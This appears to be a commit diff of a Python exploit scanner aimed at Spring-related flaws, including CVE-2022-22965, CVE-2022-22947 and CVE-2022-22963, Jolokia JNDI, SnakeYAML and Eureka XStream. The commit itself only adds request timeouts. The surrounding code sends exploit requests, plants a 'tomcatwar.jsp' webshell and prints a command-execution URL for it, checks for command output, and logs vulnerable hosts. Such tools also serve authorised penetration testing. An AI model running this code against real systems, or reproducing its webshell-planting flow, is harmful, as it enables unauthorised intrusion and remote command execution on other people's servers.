99from time import sleep
1010import urllib3
1111urllib3 .disable_warnings ()
12- requests . timeout = 10
12+ outtime = 10
1313
1414ua = ["Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36,Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36" ,
1515 "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36,Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.17 Safari/537.36" ,
@@ -36,13 +36,13 @@ def CVE_2022_22965(url, proxies):
3636 getpayload = url + payload_http
3737 try :
3838 requests .packages .urllib3 .disable_warnings ()
39- requests .post (url , headers = Headers_1 , data = data1 , allow_redirects = False , verify = False , proxies = proxies )
39+ requests .post (url , headers = Headers_1 , timeout = outtime , data = data1 , allow_redirects = False , verify = False , proxies = proxies )
4040 sleep (0.5 )
41- requests .post (url , headers = Headers_1 , data = data2 , allow_redirects = False , verify = False , proxies = proxies )
41+ requests .post (url , headers = Headers_1 , timeout = outtime , data = data2 , allow_redirects = False , verify = False , proxies = proxies )
4242 sleep (0.5 )
43- requests .get (getpayload , headers = Headers_1 , allow_redirects = False , verify = False , proxies = proxies )
43+ requests .get (getpayload , headers = Headers_1 , timeout = outtime , allow_redirects = False , verify = False , proxies = proxies )
4444 sleep (0.5 )
45- test = requests .get (url + "tomcatwar.jsp" , allow_redirects = False , verify = False , proxies = proxies )
45+ test = requests .get (url + "tomcatwar.jsp" , timeout = outtime , allow_redirects = False , verify = False , proxies = proxies )
4646 if (test .status_code == 200 ):
4747 cprint ("[+] [CVE-2022-22965] Webshell为:" + url + "tomcatwar.jsp?pwd=tomcat&cmd=whoami" ,"red" )
4848 f2 = open ("vulout.txt" , "a" )
@@ -76,7 +76,7 @@ def CVE_2022_22963(url, proxies):
7676 try :
7777 urltest = url + path
7878 requests .packages .urllib3 .disable_warnings ()
79- req = requests .post (url = urltest , headers = header , data = data , verify = False , proxies = proxies )
79+ req = requests .post (url = urltest , headers = header , timeout = outtime , data = data , verify = False , proxies = proxies )
8080 code = req .status_code
8181 text = req .text
8282 rsp = '"error":"Internal Server Error"'
@@ -123,29 +123,29 @@ def CVE_2022_22947(url, proxies):
123123
124124 try :
125125 requests .packages .urllib3 .disable_warnings ()
126- re1 = requests .post (url = url + "actuator/gateway/routes/hacktest" , data = payload_linux , headers = headers1 , json = json ,verify = False , proxies = proxies )
127- re2 = requests .post (url = url + "actuator/gateway/refresh" , headers = headers2 , verify = False , proxies = proxies )
128- re3 = requests .get (url = url + "actuator/gateway/routes/hacktest" , headers = headers2 , verify = False , proxies = proxies )
126+ re1 = requests .post (url = url + "actuator/gateway/routes/hacktest" , timeout = outtime , data = payload_linux , headers = headers1 , json = json ,verify = False , proxies = proxies )
127+ re2 = requests .post (url = url + "actuator/gateway/refresh" , headers = headers2 , timeout = outtime , verify = False , proxies = proxies )
128+ re3 = requests .get (url = url + "actuator/gateway/routes/hacktest" , headers = headers2 , timeout = outtime , verify = False , proxies = proxies )
129129 if ('uid=' in str (re3 .text )) and ('gid=' in str (re3 .text )) and ('groups=' in str (re3 .text )):
130130 cprint (f'[+] [CVE-2022-22947] { url } , "red" )
131131 f2 = open ("vulout.txt" , "a" )
132132 f2 .write ("[+] [CVE-2022-22947] " + url + '\n ' )
133133 f2 .close ()
134134 else :
135- re4 = requests .delete (url = url + "actuator/gateway/routes/hacktest" , headers = headers2 , verify = False , proxies = proxies )
136- re5 = requests .post (url = url + "actuator/gateway/refresh" , headers = headers2 , verify = False , proxies = proxies )
137- re1 = requests .post (url = url + "actuator/gateway/routes/hacktest" , data = payload_windows , headers = headers1 , json = json ,verify = False , proxies = proxies )
138- re2 = requests .post (url = url + "actuator/gateway/refresh" , headers = headers2 , verify = False , proxies = proxies )
139- re3 = requests .get (url = url + "actuator/gateway/routes/hacktest" , headers = headers2 , verify = False , proxies = proxies )
135+ re4 = requests .delete (url = url + "actuator/gateway/routes/hacktest" , headers = headers2 , timeout = outtime , verify = False , proxies = proxies )
136+ re5 = requests .post (url = url + "actuator/gateway/refresh" , headers = headers2 , timeout = outtime , verify = False , proxies = proxies )
137+ re1 = requests .post (url = url + "actuator/gateway/routes/hacktest" , data = payload_windows , headers = headers1 , timeout = outtime , json = json ,verify = False , proxies = proxies )
138+ re2 = requests .post (url = url + "actuator/gateway/refresh" , headers = headers2 , timeout = outtime , verify = False , proxies = proxies )
139+ re3 = requests .get (url = url + "actuator/gateway/routes/hacktest" , headers = headers2 , timeout = outtime , verify = False , proxies = proxies )
140140 if ('<DIR>' in str (re3 .text )):
141141 cprint (f'[+] [CVE-2022-22947] { url } , "red" )
142142 f2 = open ("vulout.txt" , "a" )
143143 f2 .write ("[+] [CVE-2022-22947] " + url + '\n ' )
144144 f2 .close ()
145145 else :
146146 cprint ("[-] 目标 " + url + " 验证CVE-2022-22947漏洞不存在" , "yellow" )
147- re4 = requests .delete (url = url + "actuator/gateway/routes/hacktest" , headers = headers2 , verify = False , proxies = proxies )
148- re5 = requests .post (url = url + "actuator/gateway/refresh" , headers = headers2 , verify = False , proxies = proxies )
147+ re4 = requests .delete (url = url + "actuator/gateway/routes/hacktest" , headers = headers2 , timeout = outtime , verify = False , proxies = proxies )
148+ re5 = requests .post (url = url + "actuator/gateway/refresh" , headers = headers2 , timeout = outtime , verify = False , proxies = proxies )
149149 except KeyboardInterrupt :
150150 print ("Ctrl + C 手动终止了进程" )
151151 sys .exit ()
@@ -171,7 +171,7 @@ def JeeSpring_2023(url,proxies):
171171
172172 try :
173173 requests .packages .urllib3 .disable_warnings ()
174- re1 = requests .post (url = url + path , data = payload , headers = headers1 , verify = False , proxies = proxies )
174+ re1 = requests .post (url = url + path , data = payload , headers = headers1 , timeout = outtime , verify = False , proxies = proxies )
175175 code1 = re1 .status_code
176176 if ('jsp' in str (re1 .text )) and (int (code1 ) == 200 ):
177177 cprint (f'[+] [JeeSpring_2023] { url } , "red" )
@@ -196,12 +196,12 @@ def JolokiaRCE(url,proxies):
196196
197197 try :
198198 requests .packages .urllib3 .disable_warnings ()
199- re1 = requests .post (url = url + path1 , allow_redirects = False , verify = False , proxies = proxies )
199+ re1 = requests .post (url = url + path1 , timeout = outtime , allow_redirects = False , verify = False , proxies = proxies )
200200 code1 = re1 .status_code
201- re2 = requests .post (url = url + path2 , allow_redirects = False , verify = False , proxies = proxies )
201+ re2 = requests .post (url = url + path2 , timeout = outtime , allow_redirects = False , verify = False , proxies = proxies )
202202 code2 = re2 .status_code
203203 if ((int (code1 ) == 200 ) or (int (code2 ) == 200 )):
204- retest = requests .get (url = url + path3 , verify = False , proxies = proxies )
204+ retest = requests .get (url = url + path3 , timeout = outtime , verify = False , proxies = proxies )
205205 code3 = retest .status_code
206206 if ('reloadByURL' in str (retest .text )) and (code3 == 200 ):
207207 cprint (f'[+] [Jolokia-Realm-JNDI-RCE-1] { url } , "red" )
@@ -232,10 +232,10 @@ def CVE_2021_21234(url,proxies):
232232
233233 try :
234234 requests .packages .urllib3 .disable_warnings ()
235- re1 = requests .post (url = url + payload1 , verify = False , proxies = proxies )
236- re2 = requests .post (url = url + payload2 , verify = False , proxies = proxies )
237- re3 = requests .post (url = url + payload3 , verify = False , proxies = proxies )
238- re4 = requests .post (url = url + payload4 , verify = False , proxies = proxies )
235+ re1 = requests .post (url = url + payload1 , timeout = outtime , verify = False , proxies = proxies )
236+ re2 = requests .post (url = url + payload2 , timeout = outtime , verify = False , proxies = proxies )
237+ re3 = requests .post (url = url + payload3 , timeout = outtime , verify = False , proxies = proxies )
238+ re4 = requests .post (url = url + payload4 , timeout = outtime , verify = False , proxies = proxies )
239239 if (('MAPI' in str (re1 .text )) or ('MAPI' in str (re2 .text ))):
240240 cprint (f'[+] [CVE-2021-21234-Win] { url } , "red" )
241241 f2 = open ("vulout.txt" , "a" )
@@ -273,8 +273,8 @@ def SnakeYAML_RCE(url,proxies):
273273 try :
274274 requests .packages .urllib3 .disable_warnings ()
275275 urltest = url + path
276- re1 = requests .post (url = urltest , headers = Headers_1 , data = payload_1 , allow_redirects = False , verify = False , proxies = proxies )
277- re2 = requests .post (url = urltest , headers = Headers_2 , data = payload_2 , allow_redirects = False , verify = False , proxies = proxies )
276+ re1 = requests .post (url = urltest , headers = Headers_1 , timeout = outtime , data = payload_1 , allow_redirects = False , verify = False , proxies = proxies )
277+ re2 = requests .post (url = urltest , headers = Headers_2 , timeout = outtime , data = payload_2 , allow_redirects = False , verify = False , proxies = proxies )
278278 if ('example.yml' in str (re1 .text )):
279279 cprint (f'[+] [SnakeYAML_RCE-1] { url } , "red" )
280280 f2 = open ("vulout.txt" , "a" )
@@ -314,8 +314,8 @@ def Eureka_xstream_RCE(url,proxies):
314314 requests .packages .urllib3 .disable_warnings ()
315315 urltest1 = url + path1
316316 urltest2 = url + path2
317- re1 = requests .post (url = urltest1 , headers = Headers_1 , data = payload_1 , allow_redirects = False , verify = False , proxies = proxies )
318- re2 = requests .post (url = urltest2 , headers = Headers_2 , data = payload_2 , allow_redirects = False , verify = False , proxies = proxies )
317+ re1 = requests .post (url = urltest1 , headers = Headers_1 , timeout = outtime , data = payload_1 , allow_redirects = False , verify = False , proxies = proxies )
318+ re2 = requests .post (url = urltest2 , headers = Headers_2 , timeout = outtime , data = payload_2 , allow_redirects = False , verify = False , proxies = proxies )
319319 if ('127.0.0.2' in str (re1 .text )):
320320 cprint (f'[+] [Eureka_Xstream-1] { url } , "red" )
321321 f2 = open ("vulout.txt" , "a" )
@@ -350,7 +350,7 @@ def CVE_2018_1273(url,proxies):
350350 requests .packages .urllib3 .disable_warnings ()
351351 urltest1 = url + path1
352352 urltest2 = url + path2
353- re1 = requests .get (url = urltest1 , headers = Headers , allow_redirects = False , verify = False , proxies = proxies )
353+ re1 = requests .get (url = urltest1 , headers = Headers , timeout = outtime , allow_redirects = False , verify = False , proxies = proxies )
354354 code1 = re1 .status_code
355355 if ((int (code1 ) == 200 ) and ('Users' in str (re1 .text ))):
356356 cprint (f'[+] [CVE-2018-1273] { url } , "red" )
@@ -415,7 +415,7 @@ def poc(filename,proxies):
415415 url = url + "/"
416416 try :
417417 requests .packages .urllib3 .disable_warnings ()
418- r = requests .get (url , verify = False , proxies = proxies )
418+ r = requests .get (url , timeout = outtime , verify = False , proxies = proxies )
419419 if r .status_code == 503 :
420420 continue
421421 except KeyboardInterrupt :
0 commit comments